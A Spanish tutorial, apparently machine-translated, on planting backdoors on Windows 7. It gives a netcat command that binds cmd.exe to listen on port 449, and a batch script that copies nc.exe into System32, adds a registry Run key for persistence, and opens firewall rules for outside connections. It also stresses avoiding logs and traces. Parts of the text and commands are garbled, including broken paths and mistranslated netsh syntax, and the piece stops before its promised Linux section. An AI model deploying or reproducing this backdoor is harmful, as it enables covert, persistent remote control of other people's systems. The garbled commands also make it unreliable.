Cómo instalar puertas traseras en Windows y Linux
Suponiendo que el usuario inicia sesión en el sistema con derechos de administrador, utilice netcat para crear una puerta trasera en el sistema Windows 7.
Netcat está relativamente sin implementar y carece de muchas de las capacidades de penetración que necesitamos. Crearemos un conjunto de herramientas portátil para resolver este problema:
1. Descargue el archivo adjunto y guárdelo como archivo adjunto.
2. Edite el archivo especificado.
3. Cree rápidamente puertas traseras de ejecución.
4. Toma el control de un servidor remoto y haz bromas :)
Para que puedas obtener el kit de herramientas lo antes posible, debes colocarlo en una unidad USB separada. o servidor en línea.
Aplicaciones portátiles
Una aplicación portátil es un programa que se puede utilizar sin instalación, generalmente empaquetando todo el entorno de ejecución y el programa principal en un único archivo portátil. En el proceso de ejecución del archivo independiente, libera sus propios requisitos y crea un entorno en el que el programa de destino puede ejecutarse sin problemas.
1. No depende de un dll específico (el dll ha sido empaquetado)
2. No depende de la configuración del registro (puede inicializarse por sí mismo), sin dejar rastros de las operaciones del registro
3. Minimiza los rastros de operaciones y trata de evitar todas las operaciones innecesarias para evitar dejar demasiados registros de operaciones del sistema.
Crea un conjunto de herramientas para Windows 7.
gVim (a través del editor de texto de plataforma, que proporciona potentes funciones de interacción de línea de comandos)
Wget (descarga la versión de Windows de 64 bits)
Netcat
Usuarios que utilizan el sistema Kali puede usar "find / -name nc.exe " Buscar cat-for-windows/
0×01 Primer intento en la puerta trasera de Netcat
nc.exe -dLp 449 -e cmd. exe -L Esta opción activa un servicio de escucha y espera a que los clientes se conecten, luego proporciona interacciones apropiadas una vez que el cliente se conecta exitosamente.
- p especifica el puerto en el que escucha el programa (los derechos de no administrador solo se aplican a puertos superiores a 1024. No puede reutilizar un puerto existente)
- e recibe una conexión de cliente después eso, se ejecutará un programa específico (cmd.exe en este caso). exe), este programa es responsable de la siguiente interacción de la sesión (ejecutando cualquier comando enviado por el cliente en una etapa posterior)
-d adopta el modo de escucha silenciosa para evitar que nc se ejecute en modo de escucha silenciosa y así evitar la grabación. Demasiados registros
Script por lotes de instalación de puerta trasera de Windows 7
@echo off
Rem copia archivos al directorio del sistema
xcopy "systemdrive \username\Desktop\nc.exe" "C:
\Windows\System32\" - Modifica el registro para agregar un código de inicio automático de puerta trasera.
reg add "HKLM\software\microsoft\windows\currentversion\run" /f /v "sistema" /t
REG_SZ /d "C:\windows\system32\nc .exe -Ldp 449 -e cmd.exe"
Rem Agregue reglas de firewall, abra el puerto de escucha 449 y permita conexiones externas.
netsh advfirewall firewall agregar nombre de regla="Regla 34" dir=in action=allow
protocol=UDP localport=449
netsh advfirewall firewall agregar nombre de regla ="Regla 35" dir=in action=allow
protocol=TCP localport=449
Rem Agregue una regla de firewall para permitir que nc.exe proporcione conexiones externas.
netsh advfirewall firewall agregar regla nombre="Allow Messenger" dir=in action=allow
program="C:\windows\system32\nc.exe"
Rem Agregue la regla de firewall para permitir que nc.exe proporcione conexiones externas.